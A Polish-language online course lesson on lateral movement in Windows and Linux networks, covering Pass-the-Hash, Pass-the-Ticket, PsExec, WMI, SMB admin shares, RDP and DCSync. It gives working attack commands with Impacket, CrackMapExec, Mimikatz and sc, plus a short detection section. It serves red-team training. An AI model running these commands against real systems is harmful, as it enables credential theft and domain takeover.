0Pricing
Cyber Security Academy · Lekcja

Techniki poruszania się lateralnego

Nauczy się Pan/Pani poruszać po sieciach za pomocą WMI, PsExec, WinRM i udziałów SMB bez wywoływania alertów.

Techniki poruszania się lateralnego to bezpłatna lekcja Cyber Security Academy na CoddyKit. To lekcja 3 z 4. Możesz przeczytać całą lekcję poniżej za darmo — a potem ćwiczyć ją interaktywnie w przeglądarce z wbudowanym edytorem kodu i tutorem AI dostępnym 24/7. To część ścieżki edukacyjnej Cyber Security Academy, a Twój postęp synchronizuje się między webem a aplikacją CoddyKit. Kurs Cyber Security Academy zawiera 4 lekcji w sumie.

Czym jest ruch boczny?

Ruch boczny to zbiór technik używanych przez atakujących do stopniowego przemieszczania się w sieci po uzyskaniu początkowego dostępu — od pierwszego przyczółka w kierunku celów o większej wartości, takich jak kontrolery domeny, bazy danych i systemy kopii zapasowych.

Pass-the-Hash (PtH)

Uwierzytelnianie NTLM systemu Windows umożliwia użycie bezpośrednio skrótu hasła zamiast hasła w jawnym tekście. Atakujący, który pozyskał zrzuty skrótów NTLM, może uwierzytelnić się w innych systemach bez łamania skrótu.

# Impacket psexec with PtH:
impacket-psexec -hashes :NTLM_HASH_HERE administrator@10.0.0.5

# CrackMapExec:
crackmapexec smb 10.0.0.0/24 -u administrator -H NTLM_HASH

Pass-the-Ticket (PtT)

Bilety Kerberos (TGT lub TGS) można wyodrębnić z pamięci i zaimportować, aby uwierzytelnić się jako ich posiadacz. Ataki Golden Ticket polegają na fałszowaniu biletów TGT przy użyciu skrótu KRBTGT, zapewniając nieograniczony dostęp Kerberos do domeny.

Zdalne wykonywanie kodu: PSExec

psexec (Sysinternals i Impacket) wykonuje polecenia na zdalnych hostach Windows za pośrednictwem udziałów SMB/administracyjnych. Wymaga poświadczeń administratora. Tworzy plik binarny usługi na hoście docelowym.

impacket-psexec administrator:Password@10.0.0.5
# Or via Metasploit:
use exploit/windows/smb/psexec

Ruch boczny za pomocą WMI

Windows Management Instrumentation umożliwia zdalne wykonywanie kodu bez tworzenia plików, które mogłoby wykryć wiele narzędzi:

# Using wmiexec (Impacket):
impacket-wmiexec administrator:Password@10.0.0.5
# Or via PowerShell:
$wmi = [wmiclass]"\\10.0.0.5\root\cimv2:Win32_Process"
$wmi.Create("cmd.exe /c payload.exe")

SMB i udziały administracyjne

Udziały administracyjne Windows (C$, ADMIN$, IPC$) umożliwiają ruch boczny przy użyciu poświadczeń administratora:

# Mount admin share:
net use \\10.0.0.5\C$ /user:DOMAIN\administrator Password
# Copy and execute:
copy evil.exe \\10.0.0.5\C$\Windows\Temp\
impacket-smbexec administrator:Password@10.0.0.5

Usługi zdalne: sc i at

Tworzenie usług lub zaplanowanych zadań w systemach zdalnych:

# Create remote service:
sc \\10.0.0.5 create EvilSvc binPath= "C:\Temp\payload.exe"
sc \\10.0.0.5 start EvilSvc

# Scheduled task:
impacket-atexec administrator:Password@10.0.0.5 "whoami > C:\Temp\out.txt"

RDP i sesje interaktywne

RDP (Remote Desktop Protocol, port 3389) zapewnia pełny interaktywny dostęp. Atakujący używają RDP przy użyciu skradzionych poświadczeń. Ochrona: należy ograniczyć RDP do serwerów przesiadkowych, wymagać NLA i rejestrować wszystkie sesje.

# RDP with stolen creds:
xfreerdp /u:administrator /p:Password /v:10.0.0.5
# Bypass NLA with NTLM hash:
xfreerdp /u:administrator /pth:NTLM_HASH /v:10.0.0.5

SSH jako metoda ruchu bocznego

W środowiskach Linux użycie SSH ze skradzionymi kluczami lub poświadczeniami umożliwia ruch boczny. Nadużywanie przekazywania agenta pozwala pivotować przez przejęte hosty. Tunele SSH przekazują porty, umożliwiając dostęp do systemów, które w innym przypadku byłyby niedostępne.

# SSH pivoting:
ssh -L 5432:internal-db:5432 user@pivot_host
# SSH dynamic SOCKS proxy:
ssh -D 1080 user@pivot_host

Replikacja usługi Active Directory (DCSync)

DCSync wykorzystuje replikację AD do pobrania skrótów haseł bezpośrednio z kontrolera domeny, bez uruchamiania na nim kodu — wymaga uprawnienia DS-Replication-Get-Changes-All:

# Impacket secretsdump:
impacket-secretsdump domain/user:password@dc_ip
# Mimikatz:
lsadump::dcsync /domain:corp.local /user:krbtgt

Wykrywanie ruchu bocznego

Wskaźniki wykrywania:

  • Zdarzenie 4624 (logowanie) z nietypowymi logowaniami typu 3 (sieciowymi)
  • Tworzenie usług na zdalnych hostach (zdarzenie 7045)
  • Połączenia SMB między stacjami roboczymi
  • Tworzenie procesów WMI na zdalnych hostach
  • Nietypowe zachowanie konta (użytkownik logujący się z wielu komputerów)

Szybki test: ruch boczny

Jaka technika umożliwia atakującemu uwierzytelnienie się w systemach Windows przy użyciu przechwyconego skrótu NTLM bez jego łamania?

Podsumowanie lekcji

Ruch boczny wykorzystuje przejęte poświadczenia i protokoły do rozprzestrzeniania się w sieci. Najważniejsze techniki: Pass-the-Hash (ponowne użycie skrótu NTLM), Pass-the-Ticket (Kerberos), PSExec/WMI/SMB do zdalnego wykonywania kodu oraz DCSync do pozyskiwania poświadczeń domeny. Wykrywanie: nietypowe logowania sieciowe (zdarzenie 4624), tworzenie zdalnych usług (zdarzenie 7045) i ruch SMB między stacjami roboczymi.

Często zadawane pytania

Czy lekcja „Techniki poruszania się lateralnego” jest bezpłatna?

Tak — pełny tekst „Techniki poruszania się lateralnego” jest dostępny za darmo tutaj w sieci. Aby ćwiczyć ją interaktywnie (wbudowany edytor kodu i tutor AI dostępny 24/7) i odblokować resztę kursu Cyber Security Academy, przejdź na CoddyKit PRO. Kurs Cyber Security Academy zawiera 4 lekcji w sumie.

Co nauczysz się w „Techniki poruszania się lateralnego”?

Nauczy się Pan/Pani poruszać po sieciach za pomocą WMI, PsExec, WinRM i udziałów SMB bez wywoływania alertów. Ćwiczysz Cyber Security Academy z praktycznym kodem, który uruchamiasz bezpośrednio w przeglądarce, a tutor AI dostępny 24/7 odpowiada na Twoje pytania podczas pracy nad lekcją.

Czy potrzebuję doświadczenia, aby zacząć Cyber Security Academy?

Nie wymagamy żadnego doświadczenia. Cyber Security Academy w CoddyKit jest strukturyzowany dla początkujących i zaawansowanych użytkowników, więc możesz zacząć tutaj lub od początku i uczyć się w swoim tempie. To lekcja 3 z 4.

Ile czasu zajmuje lekcja „Techniki poruszania się lateralnego”?

Większość lekcji CoddyKit trwa około 5–10 minut. Każda lekcja to mały, interaktywny krok, dzięki czemu robisz systematyczne postępy i zawsze wracasz dokładnie do tego samego miejsca — na webie i w aplikacji.

Czy mogę pisać i uruchamiać kod w tej lekcji Cyber Security Academy?

Tak. Każda lekcja Cyber Security Academy zawiera wbudowany edytor kodu, więc piszesz i uruchamiasz prawdziwy kod bezpośrednio w przeglądarce i od razu otrzymujesz sprzężenie zwrotne od AI — bez konfiguracji na komputerze.

Wszystkie lekcje w tym kursie

  1. Frameworki C2: Cobalt Strike i Sliver
  2. Binarne pliki Living-Off-the-Land (LOLBins)
  3. Techniki poruszania się lateralnego
  4. Pisanie raportów red teamu
← Powrót do Cyber Security Academy